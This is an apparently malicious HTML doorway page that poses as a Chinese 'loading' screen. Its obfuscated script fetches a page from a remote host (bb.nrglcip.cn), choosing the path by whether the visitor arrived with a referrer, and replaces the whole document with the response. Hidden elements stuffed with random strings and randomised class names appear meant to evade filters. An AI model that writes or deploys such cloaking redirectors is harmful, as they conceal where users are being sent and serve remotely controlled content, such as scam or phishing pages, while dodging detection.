<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .jd6btml {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .jd6btml .G1XwEL {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .jd6btml .content {
            line-height: 50px;
            text-align: center
        }

        .jd6btml .img {
            width: 100%
        }

        .jd6btml .FHlmlxIhT {
            text-align: center
        }

        .jd6btml .FHlmlxIhT span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .jd6btml .FHlmlxIhT span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .jd6btml .FHlmlxIhT span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .jd6btml .FHlmlxIhT span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .jd6btml .FHlmlxIhT span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .jd6btml .FHlmlxIhT span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .jd6btml .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function JcZf8xB8Em(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var MxO4o = JcZf8xB8Em('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ MxO4o +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ MxO4o +".html?a=share";
		}
		
        fbe4lGAHF=url+"#"+new Date().getTime();
        fbe4lGAHF && function() {
            $.get(fbe4lGAHF, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >L2UR2Uhz469js1YBDV026dWD6CbmsGqO3Dd</li>
<img  src='' style='display:none'>
<p  style='display:none'>CenBRDcAcW9DMRVn6uW63viWorrD2Op6p8T</p>
<p  style='display:none'>CenBRDcAcW9DMRVn6uW63viWorrD2Op6p8T</p>
<li style='display:none' >L2UR2Uhz469js1YBDV026dWD6CbmsGqO3Dd</li>
<span style='display:none'>sa0UkX2kG65ui6Lt8sjaowNJpKVyfaovjyWUpKnAIKRr0yvdw9Bu8BywXuGhbzM3cMUoQ1BN7Vf963W2pa2</span><div class="jd6btml">
    <div class="G1XwEL">
        <div class="FHlmlxIhT">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >gDjGB8OoS4688kvU2uaB4TRWlekkTv2DKr8htU6MMdU9jLbUas7uDGVinjM7E5ye9v57zUyKdRpJ6WETZBmROh</b>
<li style='display:none' >AaXCzAgku44PUNAWe0ZnHc0neMZrzI</li>
<b style='display:none' >gDjGB8OoS4688kvU2uaB4TRWlekkTv2DKr8htU6MMdU9jLbUas7uDGVinjM7E5ye9v57zUyKdRpJ6WETZBmROh</b>
<li style='display:none' >AaXCzAgku44PUNAWe0ZnHc0neMZrzI</li>
<span style='display:none'>sJ3bRl81hcwEf5aBmv0pdQ1fkpWpgprLFirqRIzd1XqBT9S9NW2SsuwYV6F3fT5C6fkGpGR</span></body>
</html>